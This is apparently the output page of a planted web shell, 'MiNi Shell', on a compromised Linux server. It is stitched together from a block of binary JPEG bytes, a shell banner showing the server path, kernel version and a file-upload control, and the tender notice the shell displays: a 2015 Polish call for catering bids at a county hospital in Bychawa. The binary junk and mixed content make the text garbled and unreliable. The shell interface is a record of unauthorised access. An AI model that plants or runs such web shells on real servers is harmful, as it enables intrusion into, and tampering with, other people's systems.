JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150908/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150908/132951-N-2015.html

<p class="kh_header"><b>Bychawa: Świadczenie usług żywieniowych dla pacjentów Szpitala Powiatowego i Zakładu Opiekuńczo-Leczniczego w Bychawie</b><br>
<b>Numer ogłoszenia: 132951 - 2015; data zamieszczenia: 08.09.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul. Piłsudskiego 28, 23-100 Bychawa, woj. lubelskie, tel. 81 5660122, 5669 463, faks 81 5660115, 5669 463.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spzoz.bychawa.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> Zamawiający nie zamierza ustanowić dynamicznego systemu zakupów</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług żywieniowych dla pacjentów Szpitala Powiatowego i Zakładu Opiekuńczo-Leczniczego w Bychawie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest całodobowe świadczenie usług żywieniowych w formie cateringu w zakresie kompleksowego przygotowywania posiłków i ich dystrybucja do kuchenek oddziałowych. 2. Usługa żywienia będzie obejmować:sporządzanie posiłków,
transport posiłków z kuchni Wykonawcy do pomieszczenia dystrybucji posiłków w szpitalu w termosach i innych szczelnie zamkniętych pojemnikach gastronomicznych,
dystrybucje posiłków na oddziały przez personel Wykonawcy, odbiór termosów i  pojemników gastronomicznych,mycie poza szpitalem termosów zbiorczych, pojemników gastronomicznych, przyborów kuchennych, łyżek do serowarnia potraw i innych pojemników potrzebnych do transportu i dystrybucji posiłków, dostarczanie pojemników na wszystkie odpady pokonsumpcyjne min 1 raz dziennie, w przypadku większej ilości odpadów częściej oraz ich odbiór zgodnie z przepisami prawa obowiązującego w tym zakresie,3. Całodzienne wyżywienie składa się ze  śniadania, obiadu i kolacji.W całym okresie realizacji zamówienia  Wykonawca zobowiązany jest do dostarczenia 74 160 posiłków (osobodni) w pełnym zakresie (śniadanie, obiad, kolacja plus herbata, kompot, dożywki cukrzycowe 2 razy dziennie). Ilość zamawianych posiłków może ulec zmianie w zależności od ilości pacjentów przebywających na oddziałach.4. Żywienie chorych będzie oparte na dietach takich jak: lekkostrawna,cukrzycowa,wrzodowa,bogatobiałkowa,bezmleczna,bezsolna,sonda, przecierka,inne diety według wskazań lekarza. 5.Wykonawca zobowiązany jest do ustalenia jadłospisów uwzględniając wyżej wymienione  diety i dostarczenia jadłospisu i zestawienia ilościowego posiłków. W przypadku zaleceń specjalnych wydanych przez lekarzy, Wykonawca będzie zobowiązany do przygotowania posiłków na bazie innych diet  niż wyżej wymienione.6. Diety ustalane będą dla każdego pacjenta indywidualnie przez lekarza prowadzącego danego Oddziału w uzgodnieniu z dietetykiem oferenta.
7. Zestawienie  łóżek rzeczywistych z podziałem na oddziały dla których wydawane będą posiłki:
Zakład Opiekuńczo-Leczniczy-42 łóżka
Oddział dziecięcy-11 łóżek
Oddział wewnętrzny-50 łóżek
8. Posiłki dostarczane będą przez Wykonawcę do kuchenek oddziałowych przed terminem wydawania posiłków (minimum 20 minut wcześniej) w celu zapewnienia konsumpcji w wyznaczonym czasie. Zapotrzebowanie żywnościowe zgłaszane będą według: nazwy oddziału, rodzaju i ilości diet telefonicznie i w formie papierowej w przypadku Zol-u.9. Harmonogram wydawania posiłków:
Śniadania w godz.7.30-8.00
Obiady w godz.12.30-13.00
Kolacje w godz. 17.00-17.30
Dożywki cukrzycowe:
Ranne 10.30.-11.00
Popołudniowe 14.30-15.00 
10. Posiłek całodobowy składa się z: śniadania stanowiącego 25 % kosztu całodobowego,obiadu stanowiącego 50 % kosztu całodobowego,kolacji stanowiącej 25 % kosztu całodobowego.11. Dla wszystkich hospitalizowanych pacjentów na śniadanie wymagane będzie zupa mleczna + dodatki (warzywa, wędlina, twaróg, pasty, masło, herbata, pieczywo, inne), pieczywo powinno być dobrej jakości bez polepszaczy smakowych, barwnikowych, każde dostarczone pieczywo powinno posiadać etykietę potwierdzającą skład i datę ważności.Przecierki, sondy, kleiki liczone są jako porcja posiłku (obiad lub śniadanie lub kolacja). W związku z tym diety cukrzycowe otrzymują dożywki.Przecierki, sondy, kleiki - jedna porcja minimum 500 ml na 1 osobę.
Dzieci do 12 lat muszą otrzymywać masło prawdziwe. 12. Wykonawca zapewni Dietetyka do kontaktu w sprawie uzgadniania jadłospisów i żywienia chorych. Jadłospisy przygotowywane będą przez Dietetyka Wykonawcy w cyklu 10 dniowym z podaniem gramatury produktów. Zmiany w jadłospisie dopuszczalne są po uzgodnieniu z Dietetykiem Zamawiającego i zatwierdzeniu przez Pielęgniarkę Naczelną.
13. Wykonawca zobowiązuje się dostarczyć wyliczenia wartości odżywczych pod względem ilościowym (wielkość porcji)  jak również wartość odżywcza ( kcal., białko, tłuszcz, węglowodany) na 1 osobę realizowanych jadłospisów. Wyliczenie ma się odbywać 1 raz w miesiącu na podstawie tabel wartości odżywczych - Instytutu Żywności i Żywienia.14. Posiłki będą przygotowywane według norm zalecanych przez Instytut Żywności i Żywienia oraz Instytut Matki i Dziecka w Warszawie z produktów świeżych o wysokiej jakości odżywczej. Wartość kaloryczna nie może być mniejsza niż 2000 kcal.15. Zamawiający będzie miał prawo przeprowadzenia kontroli żywienia pacjentów pod względem gramatury, jakości, temperatury dostarczanych potraw. Ocena jakościowa posiłków: sprawdzanie zgodności, ilość porcji, pomiary temperatur odbywają się w kuchenkach oddziałowych.16. Wykonawca będzie korzystał z artykułów spożywczych gwarantujących przygotowywane posiłków o odpowiedniej jakości. Żywienie musi odpowiadać normom żywieniowym zgodnie z obowiązującymi przepisami.17. Zamawiający nie dopuszcza wykonywania posiłków z półproduktów.
18. Pracownicy Zamawiającego zajmować się będą  dystrybucją  i poporcjowaniem posiłków na oddziałach, zebraniem naczyń stołowych po posiłkach i zmyciem naczyń. Naczynia będą przechowywane w kuchenkach oddziałowych.19. Mycie naczyń kuchennych i termosów zbiorczych odbieranych z oddziałów szpitalnych jest realizowane przez Wykonawcę i odbywa się poza szpitalem.20. Wykonawca będzie przygotowywał i dostarczał posiłki do Zamawiającego  zachowując wymogi sanitarno-epidemiologiczne  w zakresie personelu, warunków produkcji oraz weźmie odpowiedzialność za ich przestrzeganie (zasady GMP,GHP,HACCP).
21. Pracownicy Wykonawcy odpowiedzialni za realizacje usługi zobowiązani są do utrzymania w czystości sprzętu i wyposażenia tak aby spełniały wymogi sanitarno-epidemiologiczne.22. Wykonawca zobowiązany będzie do zapewnienia odpowiedniej ilości naczyń do przewożenia żywności. Transport posiłków powinien odbywać się w przeznaczonych do tego celu pojemnikach termoizolacyjnych gwarantujących zachowanie wymaganych przez Zamawiającego temperatur posiłków. Sprzęt musi być wykonany z materiału dopuszczonego do kontaktu z  żywnością oraz musi posiadać wymagane atesty, termosy muszą być opisane odpowiednimi dietami z podziałem na poszczególne oddziały tak aby nie zachodziła konieczność przelewania i przekładania żywności. Ciepłe napoje (herbata, kompot) będą dostarczane w termosach, dzbankach lub termosach z kranikiem. 23. Do Wykonawcy należy mycie, wyparzanie i dezynfekcja pojemników (termosy, bemary) w których transportowana jest żywność i napoje, po każdym posiłku w zmywalni centralnej Wykonawcy. Pojemniki nie podlegają myciu wstępnemu w kuchenkach oddziałowych ani innych pomieszczeniach Zamawiającego.
24. Wykonawca zobowiązuje się do odbioru brudnych pojemników po każdym posiłku.
25. Zamawiający zastrzega sobie prawo do kontroli  świadczenia usług w placówce Wykonawcy pod względem sanitarno-epidemiologicznym i jakościowym.
26. Każdy posiłek podstawowy musi zawierać dostateczną ilość produktów białkowych, węglowodanów i tłuszczy oraz dodatek warzyw zgodnie z obowiązującymi normami żywienia. 27. Zamawiający zastrzega sobie prawo do oceny i weryfikacji przez dietetyka Zamawiającego wszystkich parametrów wykonania zlecanej usługi na każdym etapie oraz w każdej chwili produkcji i dystrybucji posiłków,  a Wykonawca na każdym etapie oraz w każdej chwili produkcji i dystrybucji posiłków umożliwi Zamawiającemu dostęp do linii technologicznej. 28. Zamawiający zastrzega sobie prawo do bieżącej kontroli zgodności rodzaju posiłków z zamówioną dietą, degustacji potraw oraz gramatury przez dietetyka Zamawiającego z losowo wybranego termosu.
29. Wykonawca jest zobowiązany do posiadania wdrożonego systemu dobrej praktyki produkcyjnej GMP i dobrej praktyki GHP (HACCP).
30.Wykonawca zobowiązany jest posiadać umowę na odbiór i unieszkodliwienia odpadów spożywczych. 31. Potrawy na oddziały będą dostarczane, porcjowane  w pojemnikach gastronomicznych 
zachowujących odpowiednią temperaturę potraw i wydawane pacjentowi w danym oddziale.32. Pojemniki Wykonawcy do dystrybucji posiłków jak również przybory kuchenne, łyżki do serwowania potraw muszą posiadać stosowne atesty dopuszczające do kontaktu z żywnością.33. Łyżki do serwowania potraw, przybory kuchenne potrzebne do dystrybucji posiłków muszą odpowiadać gramaturze podanej w jadłospisie i będą podawane codziennie przy posiłkach czyste, myte przez Wykonawcę poza szpitalem. 34.  Wykonawca uzgadnia z upoważnioną przez Zamawiającego Pielęgniarką Epidemiologiczną  rodzaje  stosowanych środków czystościowych i preparatów dezynfekcyjnych, oraz sposoby ich stosowania. 
35. Wszystkie środki chemiczne muszą posiadać świadectwa rejestracji, atesty wymagane przy  zastosowaniu ich w placówkach Służby Zdrowia oraz w kontakcie z żywnością. 36.  Mycie brudnych przyborów kuchennych, łyżek do serwowania potraw, termosów zbiorczych,  pojemników gastronomicznych oraz innych pojemników niezbędnych do dystrybucji posiłków odbieranych z oddziałów szpitalnych jest realizowane przez Wykonawcę i odbywa się poza Szpitalem. 37. Wykonawca odpowiedzialny będzie za :stan sanitarny środka transportu,
właściwe przechowywanie środków spożywczych  z uwzględnieniem segregacji, utrzymania  temperatury i innych warunków przechowywania, stan opakowań,
smaczne, zgodne z wymogami diet przyrządzanie potraw, higienę produkcji,
sposób wydawania i dystrybucji posiłków w oddziałach szpitalnych oraz zgodnie z 
przepisami PPIS postępowanie z naczyniami do transportu i dystrybucji posiłków,   
jakościową i ilościową ocenę przygotowanych posiłków,pobieranie prób i wymazów w sytuacjach awaryjnych wymagających natychmiastowej  interwencji, na żądanie Zamawiającego, Wykonawca dostarczy wyniki tych badań,stan techniczny pojemników gastronomicznych, przyborów kuchennych, łyżek do serwowania potraw, opakowań i sprzętu służącego do transportu posiłków i dystrybucji posiłków,  pobieranie i przechowywanie prób żywnościowych u Wykonawcy z każdego wykonywanego posiłku,odbiór odpadów pokonsumpcyjnych i właściwe postępowanie z nimi zgodnie z obowiązującymi przepisami w tym zakresie
38. Koszty leczenia pacjenta, jakie powstaną na skutek zatrucia pokarmowego z winy  
Wykonawcy, będą obciążały całkowicie Wykonawcę.
39. W sytuacjach nagłych niemożliwych do przewidzenia wcześniej odpowiedzialność za  ciągłość żywienia  ponosi Wykonawca.
40. Wykonawca zobowiązuje się dostarczyć Zamawiającemu Procedury Dobrej Praktyki Higienicznej i Produkcyjnej - potwierdzenia wdrożenia systemu HACCAP dla procesu  produkcji, przygotowania i dostaw posiłków dla SPZOZ Bychawa lub w terminie 30 dni od  podpisania umowy. 41. Wykonawca zobowiązany jest do pobierania i przechowania próbek żywnościowych wszystkich potraw wchodzących w skład każdego posiłku zgodnie z przepisami prawa obowiązującymi w tym zakresie.
42. Wykonawca zobowiązuje się do poddania kontroli Narodowego Funduszu Zdrowia na zasadach określonych w ustawie z dnia 28.08.2004 roku o świadczeniach opieki zdrowotnej finansowanej ze środków publicznych.
43. Wykonawca zobowiązuje się dostarczyć Zamawiającemu w ciągu 30 dni od daty podpisania umowy Procedury mycia i dezynfekcji samochodu do transportu posiłków.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 55.32.10.00-6, 55.32.20.00-3, 55.52.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełniony powyższy warunek jeżeli Wykonawca wykaże się:
- wpisem do zakładów podlegających urzędowej kontroli organów Państwowej Inspekcji Sanitarnej zgodnie z art. 62 ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia  ( Dz. U. z 2010 r., Nr 136, poz. 914 z poźń. zm.)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wymaga w sposób szczegółowy spełnienia tego warunku</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełniony powyższy warunek jeżeli Wykonawca wykaże iż posiada:
- lokal kuchenny wyposażony w niezbędne urządzenia zapewniające przygotowywanie posiłków,
- środek transportu przystosowany do przewozu posiłków,
-  termosy, bemary, pojemniki przystosowane do transportu posiłków</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wymaga w sposób szczegółowy spełnienia tego warunku</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wymaga w sposób szczegółowy spełnienia tego warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz ofertowy - wypełniony i podpisany przez wykonawcę - Zał. Nr  1 do SIWZ,
2. Pełnomocnictwo do reprezentowania w postępowaniu albo pełnomocnictwo do reprezentowania i zawarcia umowy, w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia zgodnie z art.23 ustawy Pzp lub w przypadku gdy dokumenty składające się na ofertę podpisuje osoba nie uprawniona do reprezentowania wykonawcy-jeżeli dotyczy,3.Wykaz środka transportu przystosowanego do przewozu posiłków wraz z oświadczeniem, że posiada dokumenty potwierdzający, iż środek transportu, który będzie wykorzystywany do transportu posiłków posiada dopuszczenie do przewozu posiłków zgodnie z obowiązującym przepisami w tym zakresie i udostępni je na każde wezwanie Zamawiającego - Zał. Nr 7 do SIWZ,4.Wykaz termosów, bemarów, pojemników przystosowanych do transportu posiłków - Zał. Nr 8 do SIWZ,
5. Oświadczenie o posiadaniu lokalu (kuchni) wyposażonej w niezbędne urządzenia zapewniające przygotowywanie posiłków - Zał. Nr 9 do SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 96</li>
<li>2 - Odległość kuchni Wykonawcy od miejsca dostarczania posiłków u Zamawiającego - 4</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający przewiduje możliwość dokonania zmiany postanowień zawartej umowy
stosunku do treści oferty na podstawie której dokonano wyboru Wykonawcy na poniższych warunkach:
- w zakresie zmiany wynagrodzenia umownego w przypadku:
a) stawki podatku od towarów i usług,
b) wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust 3-5 ustawy z dnia 10 października 2002r. o minimalnym wynagrodzeniu za pracę,
c) zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub  wysokości stawki na ubezpieczenia społeczne lub zdrowotne.
-jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę.
2.  Zamawiający dopuszcza waloryzację ceny usługi po 12 miesiącach od daty rozpoczęcia 
realizacji umowy, jednak nie częściej niż jeden raz na 12 miesięcy, maksymalnie do wysokości wskaźnika cen towarów i usług konsumpcyjnych podawanych przez Główny Urząd Statystyczny za rok poprzedni.
3. Warunkiem dokonania zmian, o których mowa powyżej, jest złożenie wniosku przez stronę inicjującą zmianę zawierającego: opis propozycji zmian, uzasadnienie zmian, obliczenie kosztów zmian, jeżeli zmiana będzie miała wpływ na wynagrodzenie Wykonawcy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.spzoz.bychawa.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Sekcja ds. Zamówień Publicznych i Zaopatrzenia SP ZOZ Bychawa
ul. Piłsudskiego 26/28/30 C 23-100 Bychawa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.09.2015 godzina 13:00, miejsce: Samodzielny Publiczny Zakład Opieki Zdrowotnej
ul. Piłsudskiego 28 23-100 Bychawa, Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com